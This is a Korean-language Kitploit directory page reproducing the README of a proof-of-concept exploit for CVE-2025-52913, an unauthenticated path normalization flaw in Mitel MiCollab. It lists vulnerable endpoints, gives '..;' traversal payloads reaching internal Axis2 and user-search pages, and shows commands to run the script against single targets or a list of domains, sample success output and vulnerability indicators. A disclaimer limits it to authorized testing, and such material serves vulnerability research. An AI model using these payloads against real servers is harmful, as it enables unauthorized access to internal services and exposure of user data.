Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-CVE-2025-52913 — CVE-2025-52913에 대한 개념 증명(PoC)으로, Mitel MiCollab에 영향을 미치는 경로 정규화 취약점입니다. | Kitploit
도구/GitHubGitHub/pgasus99/poc-cve-2025-52913
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

CVE-2025-52913에 대한 개념 증명(PoC)으로, Mitel MiCollab에 영향을 미치는 경로 정규화 취약점입니다.

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-52913 - MiCollab 경로 정규화 취약점

📌 개요

이 저장소는 Mitel MiCollab에 영향을 미치는 경로 정규화 취약점인 CVE-2025-52913에 대한 개념 증명(PoC)을 포함하고 있습니다.

이 문제는 인증되지 않은 공격자가 ..;와 같은 조작된 URL 시퀀스를 활용하여 의도된 경로 제한을 우회하고 내부 애플리케이션 엔드포인트에 접근할 수 있도록 합니다.


⚠️ 영향

성공적인 악용을 통해 다음이 가능할 수 있습니다:

  • 내부 및 제한된 엔드포인트에 접근
  • 민감한 애플리케이션 구성 요소 노출
  • 잠재적 정보 노출

🎯 영향을 받는 엔드포인트

다음 경로를 통해 취약점이 트리거될 수 있습니다:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 페이로드

예시 경로 이동 페이로드:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 사용법

1. 종속성 설치

root@kitploit:~
pip install -r requirements.txt

2. 단일 대상에 대해 실행

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. 여러 대상에 대해 실행

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 예시

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 탐지

대상이 취약할 가능성이 있는 조건:

  • 서버가 HTTP 200으로 응답

  • 응답에 다음이 포함:

    • Axis2
    • Axis2 Happiness Page
    • 내부 엔드포인트의 유효한 애플리케이션 출력

🛠️ 기술 세부 사항

이 취약점은 ..;를 포함한 조작된 경로의 부적절한 정규화로 인해 발생하며, 의도된 애플리케이션 컨텍스트를 넘어서는 경로 이동이 가능합니다.

이 동작은 다음과 같은 내부 서비스를 노출할 수 있습니다:

  • Axis2 웹 서비스 인터페이스
  • 내부 사용자 관리 엔드포인트

👤 발견자

Dahmani Toumi가 발견함


📚 참고 자료

  • CVE: CVE-2025-52913
  • (사용 가능 시 공급업체 권고 또는 NVD 링크 추가)

⚖️ 면책 조항

이 프로젝트는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다.

명시적 허가 없이 이 도구를 시스템에 사용하지 마십시오. 저자는 오용이나 손해에 대해 책임을 지지 않습니다.


도구 다운로드